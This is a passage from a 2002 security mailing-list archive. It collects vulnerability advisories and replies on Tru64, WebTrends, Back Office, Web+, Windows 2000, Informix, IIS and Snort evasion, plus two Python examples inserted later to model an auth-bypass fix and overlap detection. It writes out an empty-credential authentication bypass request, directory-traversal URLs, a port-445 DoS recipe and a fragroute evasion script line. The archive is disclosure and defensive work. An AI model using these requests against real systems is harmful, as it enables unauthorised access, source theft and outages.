Compaq Tru64 UNIX libc Buffer Overflow Vulnerability

Problem first discovered: Sun, 18 Nov 2001
Published: Thu, 17 Apr 2002
--

Overview:
---------
  Libc included with Compaq Tru64 UNIX contains a buffer overflow 
  vulnerability, which could allow local attackers to elevate privileges.

Problem Description:
--------------------
  Libc included with Compaq Tru64 UNIX is vulnerable to a buffer overflow 
  due to a flaw in the handling of the environment variables LANG and LOCPATH. 
  Local attackers could elevate privileges by using a SUID/SGID executable 
  file that links to the vulnerable libc. 

Affected Versions:
------------------
  Compaq Tru64 UNIX V4.0F
  Compaq Tru64 UNIX V5.0
  Compaq Tru64 UNIX V5.1
  Compaq Tru64 UNIX V5.1A

Solution:
---------
  This problem can be eliminated by applying an appropriate patch to your 
  Tru64 UNIX version based on the information in the following URL:

  Compaq SECURITY BULLETIN (SSRT-541) Potential Security Vulnerabilities
  in Tru64, Unix, CDE, NFS, and NIS:
  http://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtml

Discovered by:
--------------
  Noboru Yoshinaga (LAC)  [EMAIL PROTECTED]

Disclaimer:
-----------
  All information in these advisories is subject to change without any 
  advance notice or mutual consensus, and each of them is released 
  as it is. LAC Co., Ltd. is not responsible for any risks of occurrences 
  caused by applying this information. 





[SNS Advisory No.50] Compaq Tru64 UNIX dtprintinfo -session Buffer Overflow Vulnerability

2002-04-17 Thread [EMAIL PROTECTED]

--
SNS Advisory No.50
Compaq Tru64 UNIX dtprintinfo -session Buffer Overflow Vulnerability

Problem first discovered: Wed, 10 Oct 2001
Published: Thu, 17 Apr 2002
--

Overview:
---------
  dtprintinfo included with Compaq Tru64 UNIX contains a buffer overflow 
  vulnerability, which could potentially allow local attackers to elevate 
  privileges.

Problem Description:
--------------------
  The /usr/dt/bin/dtprintinfo included with Compaq Tru64 UNIX is a program 
  for opening the CDE Print Manager window. This program is installed as 
  SUID root. In dtprintinfo it is possible to restore a client to the 
  original desktop state by loading the session file using the -session 
  option. A buffer overflow will occur in dtprintinfo when an unusually long 
  string of characters is used in session filenames. This will result in the 
  possibility for the local attacker to execute arbitrary code as root. 
  
Affected Versions:
------------------
  Compaq Tru64 UNIX V4.0F
  Compaq Tru64 UNIX V5.0
  Compaq Tru64 UNIX V5.1
  Compaq Tru64 UNIX V5.1A

Solution:
---------
  This problem can be eliminated by applying an appropriate patch to your 
  Tru64 UNIX version based on the information in the following URL:

  Compaq SECURITY BULLETIN (SSRT-541) Potential Security Vulnerabilities
  in Tru64, Unix, CDE, NFS, and NIS:

  http://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtml

Discovered by:
--------------
  Noboru Yoshinaga  [EMAIL PROTECTED]

Disclaimer:
-----------
  All information in these advisories is subject to change without any 
  advance notice or mutual consensus, and each of them is released 
  as it is. LAC Co., Ltd. is not responsible for any risks of occurrences 
  caused by applying this information. 





Re: ansi outer join syntax in Oracle allows access to any data

2002-04-17 Thread Greg Williamson

Tested as a user with some privs (but not DBA or SELECT ANY TABLE) as below

SQL> select username, user_id, password from sys.dba_users;
select username, user_id, password from sys.dba_users
*
ERROR at line 1:
ORA-00942: table or view does not exist


SQL> select * from v$version
  2  ;

BANNER
----------------------------------------------------------------
Oracle8i Enterprise Edition Release 8.1.6.3.0 - Production
PL/SQL Release 8.1.6.3.0 - Production
CORE8.1.6.0.0   Production
TNS for Solaris: Version 8.1.6.3.0 - Production
NLSRTL Version 3.4.0.0.0 - Production

SQL>
 

Not sure if ANSI syntax is required (not testable in 8.1.6) and I don't have
a 9i DB to test it on.

Greg.
 - Begin Forwarded Message -

 The point is that I can see the dba_users view owned by SYS as a user
 with only CREATE SESSION privilege. This is only possible because of the
 bug in the ANSI outer join syntax. This bug allows access to any table
 without any granted privileges to any user!
 
 The example you show below doesn't show which user you are logged in as
 or what privileges that user has. I assume its a user that is either a
 DBA or has select privileges on the catalog or SELECT ANY TABLE or
 select explicitly on that view.
 
 Try the exact SQL i showed and check for yourself that it doesn't work
 in 8.1.6. but will work in 9.0.1
 
 cheers
 
 Pete
 



Webtrends Reporting Center Buffer Overflow (#NISR17042002C)

2002-04-17 Thread NGSSoftware Insight Security Research

NGSSoftware Insight Security Research Advisory

Name:              WebTrends Reporting Center 4.0d
Systems Affected:  WinNT, Win2K, XP
Severity:          High Risk
Category:          Remote System Buffer Overrun
Vendor URL:        http://www.webtrends.com
Author:            Mark Litchfield ([EMAIL PROTECTED])
Advisory URL:      http://www.ngssoftware.com/advisories/wtr.txt
Date:              17th April 2002
Advisory number:   #NISR17042002C

Issue: Attackers can run arbitrary code, remotely, as SYSTEM.

Description
***
WebTrends Reporting Center provides fast and comprehensive analysis of web
site activity to multiple decision-makers  throughout an organization via a
browser-based interface.  WebTrends Reporting Center is, according to their
own website,  NetIQ's flagship web analytics reporting product, recently
receiving an Editor's Choice Award from Network Computing Magazine  (Feb 6,
2002).

Details
***
Buffer Overrun: In order to exploit this vulnerability an attacker must
first undergo user authentication at
http://targetmachine:1099/remote_login.pl (1099 is the default listening
port). However, Webtrends Reporting Server allows anonymous logins for
reports that are made available for public viewing.  After a successful
login, making a GET request to http://targetmachine:1099/reports/(Long Char
String) will cause an access violation in WTRS_UI.EXE (WTX_REMOTE.DLL),
overwriting the saved return address on the stack.  The Reporting Server
process, WTRS_UI.EXE, is by default started as a system service along with
WTRS.EXE, therefore any arbitrary code would execute with system privileges.

Path Disclosure - By making a simple GET request for
http://targetmachine/get_od_toc.pl?Profile= (no authentication required) an
error message is returned - "Unable to open content file
path=C:/PROGRA~1/WEBTRE~1/wtm_wtx/"


Fix Information
***
NGSSoftware alerted Webtrends to the buffer overrun issue on 31st March 2002
and future versions will be fixed. There is still some question as to
whether a patch will be produced for earlier versions. In the meantime
NGSSoftware recommend preventing anonymous access to the Reports server.
NGSSoftware recommend that where possible, the service be run as a low
privileged account as opposed to starting it as a system service.

A check for these issues has been added to Typhon II, NGSSoftware's
vulnerability assessment scanner, of which more information is available
from the NGSSite : http://www.ngssoftware.com/.

Further Information
***
For further information about the scope and effects of buffer overflows,
please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf






Back Office Web Administrator Authentication Bypass (#NISR17042002A)

2002-04-17 Thread NGSSoftware Insight Security Research

NGSSoftware Insight Security Research Advisory

Name:Back Office Web Administration Authentication Bypass
Systems Affected:  Microsoft's Back Office Web Administrator 4.0, 4.5
Severity:  Medium/High
Vendor URL:   http://www.microsoft.com
Author:   David Litchfield ([EMAIL PROTECTED])
Date:   17th April 2002
Advisory number: #NISR17042002A
Advisory URL:  http://www.ngssoftware.com/advisories/boa.txt

Issue: Attackers can bypass the logon page and access the Back Office Web
Administrator

Description
***
With the Microsoft Back Office suite of products comes a web based
administration ASP based application that runs on IIS. Normally, to use the
administration pages a user must authenticate but NGSSoftware have
discovered that it is trivial to bypass this.

Details
***
Each of the Back Office Web Administrator ASP pages checks to see if the
user has been authenticated but does this with the following snippet of code

 ' Only the name of the authentication scheme is tested; an Authorization
 ' header with no credentials still leaves auth_type non-empty.
 If Request.ServerVariables("auth_type") = "" Then
  Response.Status = "401 ACCESS DENIED"
  Response.End
 End If

This is the only authorization/authentication performed. As such it's
trivial to bypass:

 GET /BOADMIN/BACKOFFICE/SERVICES.ASP HTTP/1.1
 Host: hostname
 Authorization: Basic
 [enter]
 [enter]

No credentials are required as, technically, the auth_type envariable has
been set, regardless of whether a user name or password has been supplied.

Risk and Mitigating Factors
***
By default the Back Office Web Administrator is limited to the loopback
address (127.0.0.1) which means that it can't be accessed remotely. However,
it is not uncommon to change this to allow for remote administration; tying
the Administrator to the loopback address makes it somewhat useless.

Basic authentication also needs to be enabled which, again, is not uncommon.

Fix Information
***
Those that match these criteria are strongly urged to obtain the
patch from Microsoft. Please see
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316838; for more
details.

A check for this issue has also been added to Typhon II, NGSSoftware's
vulnerability assessment scanner. For more information about Typhon, please
see the NGSSite @ http://www.ngssoftware.com/.
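The check and its failure mode, as an added example that models the advisory's logic in Python; it is not Microsoft's or NGSSoftware's code, and the way AUTH_TYPE and AUTH_USER are derived from the Authorization header, the credential store and the hardened variant are assumptions made for illustration:

```python
import base64
from typing import Callable, Dict

# Constructed credential store standing in for the real authentication backend.
KNOWN_USERS = {"admin": "s3cret"}


def server_variables(headers: Dict[str, str]) -> Dict[str, str]:
    """Derive the two server variables the checks below rely on.

    Assumption for this example: AUTH_TYPE is set to the scheme name as
    soon as an Authorization header naming that scheme arrives, while
    AUTH_USER is set only after the credentials in it have been verified.
    """
    auth = headers.get("Authorization", "").strip()
    if not auth:
        return {"AUTH_TYPE": "", "AUTH_USER": ""}
    scheme, _, blob = auth.partition(" ")
    auth_type = "Basic" if scheme.lower() == "basic" else ""
    auth_user = ""
    if auth_type and blob:
        try:
            creds = base64.b64decode(blob, validate=True).decode("latin-1")
        except ValueError:  # binascii.Error is a ValueError
            creds = ""
        user, _, password = creds.partition(":")
        if user and KNOWN_USERS.get(user) == password:
            auth_user = user
    return {"AUTH_TYPE": auth_type, "AUTH_USER": auth_user}


def vulnerable_check(sv: Dict[str, str]) -> bool:
    """The advisory's logic: deny only when AUTH_TYPE is the empty string."""
    return sv["AUTH_TYPE"] != ""


def hardened_check(sv: Dict[str, str]) -> bool:
    """Require an authenticated identity, not merely the name of a scheme."""
    return sv["AUTH_TYPE"] != "" and sv["AUTH_USER"] != ""


def decide(headers: Dict[str, str], check: Callable[[Dict[str, str]], bool]) -> int:
    """Status a SERVICES.ASP-style page would return for this request."""
    return 200 if check(server_variables(headers)) else 401


# Constructed requests. EMPTY_BASIC is the header the advisory sends.
NO_AUTH = {"Host": "hostname"}
EMPTY_BASIC = {"Host": "hostname", "Authorization": "Basic"}
BAD_BASIC = {"Host": "hostname",
             "Authorization": "Basic " + base64.b64encode(b"admin:wrong").decode("ascii")}
GOOD_BASIC = {"Host": "hostname",
              "Authorization": "Basic " + base64.b64encode(b"admin:s3cret").decode("ascii")}

if __name__ == "__main__":
    cases = (("no header", NO_AUTH), ("empty Basic", EMPTY_BASIC),
             ("bad Basic", BAD_BASIC), ("valid Basic", GOOD_BASIC))
    for name, hdrs in cases:
        print(f"{name:12s} vulnerable={decide(hdrs, vulnerable_check)} "
              f"hardened={decide(hdrs, hardened_check)}")
```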





Addendum: A crash course with Linux Kernel 2.4.x, IP ID values RFC 791

2002-04-17 Thread Ofir Arkin

This was edited out by mistake:

---
Thanks:
I would like to thank Toby Miller for the TCP trace and help with 
verifying findings.
---

Thanks

-- 
Ofir Arkin
Managing Security Architect
@stake, Limited.
http://www.atstake.com
email: [EMAIL PROTECTED] 






Buffer Overrun in Talentsoft's Web+ (3) (#NISR17042002B)

2002-04-17 Thread NGSSoftware Insight Security Research

NGSSoftware Insight Security Research Advisory

Name:Web+ Cookie Buffer Overflow
Systems Affected:  IIS and Web+ 4.6/5.0 on Windows NT/2000
Severity:  High Risk
Vendor URL:   http://www.talentsoft.com
Author:   David Litchfield ([EMAIL PROTECTED])
Date:   17th April 2002
Advisory number: #NISR17042002B
Advisory URL:  http://www.ngssoftware.com/advisories/webplus3.txt

Issue: Attackers can run arbitrary code as SYSTEM on the web server.

Description
***
Talentsoft's Web+ v5.0 is a powerful and comprehensive development
environment for use in creating web-based client/server applications.

Details

By requesting a WML file from a web server and supplying an overly long
cookie, an internal buffer is overflowed, overwriting a saved return address
on the stack. On procedure return control over the web server process'
execution can be gained. If the server is running IIS 4 and using the Web+
ISAPI filter, then inetinfo.exe is the process captured. As this runs as
SYSTEM, any code supplied by an attacker will run uninhibited. If IIS 5.0
then the process is dllhost.exe which runs in the context of the IWAM_*
account. As this has limited privileges the risk is reduced. If the Web+
environment is set up using the webplus CGI executable, webplus.exe, on
either server, then, again, the risk is reduced.


Fix Information
**
Talentsoft have created a patch for this problem. Please see
http://www.talentsoft.com/download/download.en.wml for more details.
NGSSoftware urges all Web+ customers to apply this as soon as is possible. A
check for this issue has been added to Typhon II, NGSSoftware's vulnerability
assessment scanner, of which more information is available from the NGSSite
@ http://www.ngssoftware.com/.

Further Information
***
For further information about the scope and effects of buffer overflows,
please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf





KPMG-2002011: Windows 2000 microsoft-ds Denial of Service

2002-04-17 Thread Peter Gründl



  -=Windows 2000 microsoft-ds Denial of Service=-
  courtesy of KPMG Denmark

BUG-ID: 2002011
Released: 17th Apr 2002

Problem:

The default LANMAN registry settings on Windows 2000 could allow a
malicious user, with access to TCP port 445 on your Windows 2000, to
cause a Denial of Service.


Vulnerable:
===
- Windows 2000 Server (SP0, SP1, SP2)
- Windows 2000 Advanced Server (SP0, SP1, SP2)
- Windows 2000 Professional (SP0, SP1, SP2)


Details:

Sending malformed packets to the microsoft-ds port (TCP 445) can
result in kernel resources being allocated by the LANMAN service.
The consequences of such an attack could vary from the Windows
2000 host completely ignoring the attack to a blue screen.

An attack could be something as simple as sending a continuous
stream of 10k null chars to TCP port 445.

The most common symptoms would be that the LANMAN service would
allocate a lot of kernel memory, until a point, where very few
applications would be able to run. The routine that draws windows
would commence to draw incomplete windows, the warning beep
would be replaced by an error stating that the sound driver could
not be loaded. Internet Information Server would no longer be
able to service .asp pages, attempts to reboot the server (as
administrator) would result in the error "You do not have
permissions to shutdown or restart this computer.", and so on.

It would frequently be possible to cause the system service
to enter a state where it constantly used 100% CPU usage.
A PC was left in this state over the weekend, to see if it
would recover on its own. It did not recover.


Vendor URL:
===
You can visit the vendor's webpage here: http://www.microsoft.com


Vendor response:

The vendor was contacted mid-October, 2001. The vendor released a
Q-article, describing the problem and possible solutions on the 11th
of April, 2002. KPMG was notified of the publication on the 17th of
April, 2002.


Corrective action:
==
The vendor has suggested two possible solutions, available here:
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q320751


Author: Peter Gründl ([EMAIL PROTECTED])


KPMG is not responsible for the misuse of the information we provide
through our security advisories. These advisories are a service to
the professional security community. In no event shall KPMG be lia-
ble for any consequences whatsoever arising out of or in connection
with the use or spread of this information.





IBM Informix Web DataBlade: Local root by design

2002-04-17 Thread Simon Lodal

IBM Informix Web DataBlade: Local root by design

By Simon Lodal, Denmark
Vendor status: Notified months ago, said they would be working on
updates, never heard anything.
Software: Web DataBlade 4.12, IDS 9.20/9.21, Linux 2.2/2.4, SunOS 5.7
(OS, IDS and WDB versions seem to be irrelevant).

Impact: Any user who can: 1) Save a Perl script anywhere on the server's
disk, 2) Run WebDataBlade HTML code of his own choice (calling that Perl
script) ... can execute any code of choice as the database uid, which is
usually root. Any WDB developer can do this. Any other local user with
admin rights on any database can do it by loading the WDB module into
their database. Other local users will not be able to exploit this by
default, but if just one WDB developer has lax permissions on his
scripts, other users may modify it to assign root access to themselves.
Finally, the SQL injection vulnerability (other report) allows any
remote user to save Perl script and execute it from HTML code. These
vulnerabilities can therefore be combined into a remote root exploit.

Workaround: Disable the entire Perl script feature. I believe it must be
enabled explicitly, but that may depend on how you got Web DataBlade.
However, any site needing to send mail, copy/move/create/delete external
files, or otherwise communicate with the world outside the database,
will usually need to use this feature, as it is the easiest way to do
these things (alternatives are C and Java).


---
Details

The Web DataBlade has an unrestricted facility for running commands of
choice as the database user. The database runs as root, unless you have
taken special precautions to start it as another user. Therefore you get
root, by design. Or at least informix, if the administrator managed to
start the database as this user.

The Web DataBlade language has no builtin commands for dealing with
files, network etc. Instead, Informix allows calling external scripts.
Such a feature, you would think, would simply allow execution of shell
commands, like system(). But Informix decided a much more complex setup
using a long-running daemon written in Perl. You cannot call shell
commands from the HTML pages; instead, pages instruct the daemon to
execute a labeled piece of (Perl) code, a meta function. The Perl
daemon is connected through a socket connection. The daemon is started
the first time a function in it is called, and keeps running until the
database itself is shutdown.

This design may look nice. Some actions can be done with Perl code
alone, avoiding spawning a new process and thus potentially gaining
speed. Too, it limits what commands can be run; this is decided by the
person who has access to change the Perl script. And it can take some
complexity away from the HTML code.

But now the trouble. Anyone with write access to somewhere on the
server's disk can add his own Perl script. Anybody who can add WDB HTML
code can request his own page and thus call the script and the functions
within it. Several different Perl daemons can run simultaneously, and
there are no restrictions on where the scripts should be placed, who can
call the actions within them, who should own them or what their
permissions should be.

All this would not be so bad, if the script were just run as
stand-alone, one-shot shell commands, running under the uid of the
calling user. But the scripts are started by the database, and keep
running as the database user (again, usually root), regardless of
caller's identity. Simply said, you can create a Perl script of choice
and have it run as root.

Unfortunately this is an utter design mistake which can not easily be
fixed, at least not without breaking existing scripts. The Webdriver
module usually logs into the database using one specific
username/password, but it can also be configured to login on behalf of
the actual user making the connection to the webserver. This would not
be a problem if external commands were executed as separate processes
running under the uid of the connecting user, but here we are dealing
with a daemon executing commands on behalf of possibly many different
uids (any uid which the webdriver can connect as). And in their infinite
wisdom Informix decided that when we don't know which uid we will serve,
they'll better just get the uid of the database server itself, which
usually happens to be root. They simply did not even think about how to
deal with the change of uids. A brief discussion I had with a developer
at Informix clearly indicated complete lack of understanding of this
problem.

As a sidenote, Informix' own example script contains an action which is
intended to allow execution of user-defined Perl code...

Proof of concept: I am not going to provide the exact syntax here since
that does not help the description any further. Anyone with access to a
machine running WDB can fetch the example script and modify it. Try fx
to write a new file, and see who gets to own it.


Simon Lodal



Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

2002-04-17 Thread H D Moore

Right, you can only access files ending in the four allowed extensions.
These extensions are: .asp, .inc, .htm, and .html.

-HD

On Wednesday 17 April 2002 07:25 am, Randy Hinders wrote:
> While checking various files and extensions I wanted to ensure that other
> files were still protected from this.  I was not able to read the
> global.asa but was able to read (as expected) other asp pages..
>
> http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/global.asa
> Returned "View Active Server Page Source-- Access Denied" to the browser.
>
> http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iisstart.asp
> Returned the source code to the browser.




RE: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

2002-04-17 Thread Randy Hinders

While checking various files and extensions I wanted to ensure that other 
files were still protected from this.  I was not able to read the 
global.asa but was able to read (as expected) other asp pages..

http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/global.asa
Returned "View Active Server Page Source-- Access Denied" to the browser.

http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iisstart.asp
Returned the source code to the browser.

Yes, the IISSAMPLES and all other SDK items should never be installed on a 
production machine, but should a client upload this code to a shared hosting 
environment where the global.asa is properly protected with NTFS permissions 
they will not be able to gain access to the source code through this method.

HTH

Randy Hinders
MCT (ret.), MCSE, MCP +I & A+
NT Systems Administrator
DONet, Inc
www.donet.com
www.adsi4nt.com
~~Hoka Hey, Lakotas~~



-Original Message-
From: H D Moore [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, April 16, 2002 11:01 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure


--[ Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

Summary:

Microsoft's IIS 5.0 web server is shipped with a set of
sample files to demonstrate different features of the ASP
language. One of these sample files allows a remote user to
view the source of any file in the web root with the extension
.asp, .inc, .htm, or .html. The IISSamples virtual directory
should not be left on production servers in the first place,
but until now there were no serious[1] vulnerabilities found in
those sample scripts. Microsoft was _not_ contacted about
this, they can read the lists like everyone else. This is an
issue that can be fixed by proper system administration.

<snip>






Microsoft Security Bulletin MS02-019: Unchecked Buffer in Internet Explorer and Office for Mac Can Cause Code to Execute (Q321309)

2002-04-17 Thread Microsoft

-BEGIN PGP SIGNED MESSAGE-

- --
Title:  Unchecked Buffer in Internet Explorer and Office for 
Mac Can Cause Code to Execute (Q321309)
Date:   16 April 2002
Software:   Microsoft Internet Explorer 5.1 for Macintosh, Microsoft
Outlook Express 5.0 for Macintosh, Microsoft Office v. X,
for Macintosh, Microsoft Office 2001 for Macintosh,
Microsoft PowerPoint 98 for Macintosh
Impact: Run Code of Attacker's Choice
Max Risk:   Critical
Bulletin:   MS02-019

Microsoft encourages customers to review the Security Bulletin at: 
http://www.microsoft.com/technet/security/bulletin/MS02-019.asp.
- -
- --

Issue:
==
This is a cumulative patch that, when applied, eliminates all
previously released security vulnerabilities affecting IE 5.1 for
Macintosh, and Office v. X for Macintosh. In addition, it eliminates
two newly discovered vulnerabilities. 

 - The first is a buffer overrun vulnerability associated with the
   handling of a particular HTML element. Because of support for
   HTML in Office applications, this flaw affects both IE and Office
   for Macintosh. A security vulnerability results because an
   attacker can levy a buffer overrun attack against IE that attempts
   to exploit this flaw. A successful attack would have the result of
   causing the program to fail, or to cause code of the attacker's
   choice to run as if it were the user. 

 - The second is a vulnerability that can allow local AppleScripts
   to be invoked by a web page. This vulnerability can allow locally
   stored AppleScripts to be invoked automatically without first
   calling the Helper application. The AppleScripts would run as if
   they had been launched by the user, and could take the same
   actions as any AppleScript legitimately launched by the user.
   The AppleScript would have to already be present on the system;
   there is no way for an attacker to deliver an AppleScript of her
   choosing through this vulnerability.

Mitigating Factors:

Unchecked Buffer in HTML Element: 

 - Successfully exploiting this issue with Office files requires
   that a user accept files from an unknown or untrusted source.
   Users should never accept files from unknown or untrusted sources.
   Accepting files only from trusted sources can prevent attempts
   to exploit this issue. 

 - A successful attack using HTML email would require specific
   knowledge of the user's mail client and cannot be mounted against
   PC users. 

 - A successful attack using an HTML web page would require the
   attacker to lure the user to visiting a site under her control.
   Users who exercise caution in their browsing habits can
   potentially protect themselves from attempts to exploit this
   vulnerability. 

 - On operating systems that enforce security on per-user basis,
   such as Mac OS X, the specific actions that an attacker's code
   can take would be limited to those allowed by the privileges of
   the user's account. 

Local AppleScript Invocation: 

 - The vulnerability only affects IE on Mac OS 8 & 9. 

 - A successful attack requires that the attacker know the full path
   and file name of any AppleScript they want to invoke.
 
 - The vulnerability provides no means to deliver an AppleScript of
   the attacker's construction: it can only invoke AppleScripts
   already present on the user's system.

Risk Rating:

 - Internet systems: None
 - Intranet systems: None
 - Client systems: Critical

Patch Availability:
===
 - A patch is available to fix this vulnerability. Please read the 
   Security Bulletin at
   http://www.microsoft.com/technet/security/bulletin/ms02-019.asp
   for information on obtaining this patch.

Acknowledgment:
===
 - Josha Bronson of AngryPacket Security 
   (http://sec.angrypacket.com/) and w00w00 
   (http://www.w00w00.org/).

- -

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.


Re: Snort exploits

2002-04-17 Thread Dragos Ruiu

Heh, well... first... don't panic. :-)

First of all I would like to commend Dug on his responsible disclosure stance.
He has given the IDS vendors several months heads up that this stuff is in the 
pipe...  I think everyone who needed to know knew this was coming down the pipe,
so this is in _no_ way critical of him.

I was actually expecting him to release fragroute on the CanSecWest conference CD,
for his talk on it there and am preparing some appropriate counter measures for the 
variant of snort I was going to put on there.  Been kinda swamped with conference 
preparations so please do not ask me for any of this in advance of the conference.
Odds are now that this info has gone out snort cvs will have fixes for this
in a matter of hours or days...

The TCP evasions are fairly easily detectable as overlaps should not normally occur.
I'm sure Marty or Andrew will be releasing some tweaks to stream4 shortly to 
address this. It is just a matter of slightly more rigorous alerting and
an occasional little bit of extra noise.

Similarly the IP fragmentation detection just needs slightly more rigorous
overlap detection and alerting, as these overlaps will not be occurring in 
normal situations.  For now as a workaround you can just alert on small fragments
(resurrect minfrag... heh) which should be indicative of games being played.
Note that some of these overlaps were successful in snort 1.8.x because the
teardrop detection had a bug in it which was recently found and was only fixed 
again in snort 1.8.4.  The moral of the story is that it pays to keep your copy
of snort current. :-)

Basically all the chaffing at the IP and TCP level is detectable as those 
should not be normal conditions. Look to snort cvs over the next few days
for solutions to these issues...

To Dug:

As far as playing timing games in the future, well the solution for this and some
other problems will be target based reassembly which varies reassembly timing
and overlap behaviour based on destination to mimic host specifics.  And though
the current frag2 snort defragger features deterministic timeout behaviour
the earlier defrag reassembler had non-deterministic timeout behaviours on purpose
to specifically avoid timeout games and this kind of behaviour will likely be 
resurrected on future defraggers. I have had a defragger in the works for, oh, 
a long time... :)  that fixes this and some other issues. Guess Marty, I, and 
the other snort developers have to get off our lazy asses (since snort development 
proceeds so slowly :-) and fix that now.  Heh... I'm being sarcastic for those 
that didn't note.

The same logic and procedures can be applied at the TCP level as well as
at the IP fragmentation layer BTW.

To everyone else:

The game of evasion and countermeasures is the snake eating its tail and you 
shouldn't be naive and assume that there aren't other evasions out there because 
there are _always_ other obfuscations and countermeasures, and then detectors for 
those. That's why you pay us snort developers the big bucks, and you should keep
your ids builds current fairly often... to keep you safe from that. :-)

But using fairly loaded terms like "blindside" is just excessively alarmist imho.

cheers,
--dr


On Tue, 16 Apr 2002 20:07:12 -0700
[EMAIL PROTECTED] wrote:

 
> I didn't see it posted to these lists, but yesterday Dug Song quietly released a
> tool on the focus-ids list which totally blindsides Snort -
> http://www.monkey.org/~dugsong/fragroute/index.html. His README.snort file contains
> several fragroute scripts which blindside even the current Snort version in CVS,
> tested on RedHat 7.2. For example, the latest wu-ftpd exploits run through the one
> line "tcp_seg 1 new" don't trigger any Snort alerts at all.
> :( :(
>
> Fragroute is a very powerful new tool. Has anyone found other attacks against Snort
> with it, or tried it against any other IDS for that matter?
>
>
> -=+ 0xCafeBabe +=-
>
 


-- 
--dr  pgpkey: http://dragos.com/dr-dursec.asc
  CanSecWest/core02 - May 1-3 2002 - Vancouver B.C. - http://cansecwest.com
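The overlap alerting the post calls for, as an added example written for this thread (it is not Snort's frag2 or stream4 code); the Chunk model, the MIN_FRAG_BYTES threshold and the constructed traffic are assumptions, and the chaffed stream is only loosely modelled on fragroute's overlapping-segment modes, not a reproduction of tcp_seg. One routine serves both the IP fragment and the TCP segment case, as the post says the same logic applies at both layers:

```python
from dataclasses import dataclass
from typing import List

# minfrag-style threshold; an assumption for this example, not a Snort default.
MIN_FRAG_BYTES = 64


@dataclass(frozen=True)
class Chunk:
    """One IP fragment or TCP segment: absolute start position plus payload."""
    start: int
    data: bytes
    last: bool = False  # IP only: True when the MF bit is clear

    @property
    def end(self) -> int:
        return self.start + len(self.data)


def find_overlaps(chunks: List[Chunk]) -> List[str]:
    """Alert on every pair of chunks whose byte ranges overlap.

    A well-behaved sender never offers two different bytes for one
    position, so a conflicting overlap is the strongest signal; a
    consistent overlap (same bytes) is reported too, because overlap of
    any kind is not expected in normal fragmentation or retransmission.
    """
    alerts: List[str] = []
    ordered = sorted(chunks, key=lambda c: (c.start, c.end))
    for i, a in enumerate(ordered):
        for b in ordered[i + 1:]:
            if b.start >= a.end:
                break  # sorted by start, so no later chunk can overlap a
            lo, hi = max(a.start, b.start), min(a.end, b.end)
            same = a.data[lo - a.start:hi - a.start] == b.data[lo - b.start:hi - b.start]
            kind = "consistent" if same else "CONFLICTING"
            alerts.append(f"{kind} overlap bytes {lo}-{hi - 1} "
                          f"between chunk@{a.start} and chunk@{b.start}")
    return alerts


def find_small_fragments(frags: List[Chunk]) -> List[str]:
    """minfrag-style rule for IP: a non-final fragment below the threshold."""
    return [f"small fragment: {len(f.data)} bytes at offset {f.start}"
            for f in frags if not f.last and len(f.data) < MIN_FRAG_BYTES]


def ip_fragment(offset_units: int, data: bytes, more_fragments: bool) -> Chunk:
    """Fragment offsets are in 8-byte units (RFC 791)."""
    return Chunk(start=offset_units * 8, data=data, last=not more_fragments)


def tcp_segment(seq: int, isn: int, data: bytes) -> Chunk:
    """Place a TCP segment relative to the stream's initial sequence number."""
    return Chunk(start=(seq - isn) % 2**32, data=data)


# Constructed traffic. TCP: a payload sent as 1-byte segments, each position
# also carrying a chaff byte at the same sequence number.
ISN = 1000
PAYLOAD = b"hello ids"


def chaffed_stream() -> List[Chunk]:
    segs: List[Chunk] = []
    for i, byte in enumerate(PAYLOAD):
        segs.append(tcp_segment(ISN + i, ISN, b"X"))           # chaff
        segs.append(tcp_segment(ISN + i, ISN, bytes([byte])))  # real byte
    return segs


def overlapping_fragments() -> List[Chunk]:
    """Constructed IP: the second fragment rewrites the tail of the first."""
    return [
        ip_fragment(0, b"A" * 24, True),   # bytes 0-23
        ip_fragment(2, b"B" * 16, True),   # bytes 16-31, overlaps 16-23
        ip_fragment(4, b"C" * 8, False),   # bytes 32-39, final
    ]


def clean_fragments() -> List[Chunk]:
    """Constructed IP: adjacent fragments with no overlap."""
    return [ip_fragment(0, b"A" * 64, True), ip_fragment(8, b"B" * 8, False)]


if __name__ == "__main__":
    print("tcp chaff :", find_overlaps(chaffed_stream()))
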